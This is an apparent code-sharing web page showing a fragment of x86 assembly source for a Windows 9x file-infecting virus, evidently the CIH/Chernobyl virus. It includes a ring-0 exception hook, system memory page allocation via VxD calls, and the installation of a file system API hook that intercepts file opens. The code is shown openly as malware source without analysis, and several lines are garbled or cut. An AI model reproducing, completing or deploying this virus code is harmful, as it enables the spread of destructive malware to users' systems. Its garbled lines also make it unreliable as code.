📄 cih14.txt
字号:
pop ebp
push 00401000h
OriginalAddressOfEntryPoint = $-4
ret
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf
dException
ExitRing0Init:
mov [ebx-04h], bp
shr ebp, 16
mov [ebx+02h], bp
iretd
AllocateSystemMemoryPage:
mov dr0, ebx
in System
push 00000000fh
push ecx
push 0ffffffffh
push ecx
push ecx
push ecx
push 000000001h
push 000000002h
int 20h
_PageAllocate = $
dd 00010053h
add esp, 08h*04h
xchg edi, eax
s
lea eax, MyVirusStart-@2[esi]
iretd
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax
int 20h
IFSMgr_InstallFileSystemApiHook = $
dd 00400067h
mov dr0, eax
ss
pop eax
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
CodeSizeOfMergeVirusCodeSection = offset $
InstallFileSystemApiHook:
push ebx
call @4
@4:
pop ebx
add ebx, FileSystemApiHook-@4
push ebx
int 20h
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h
pop eax
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax
ress
pop eax
pop ebx
ret
OldInstallFileSystemApiHook dd ?
FileSystemApiHook:
@3 = FileSystemApiHook
pushad
call @5
@5:
pop esi
ss
add esi, VirusGameDataStartAddress-@5
test byte ptr (OnBusy-@6)[esi], 01h
jnz pIFSFunc
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook
inc byte ptr (OnBusy-@6)[esi]
add esi, FileNameBuffer-@6
push esi
mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ':'
mov [esi], eax
inc esi
inc esi
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -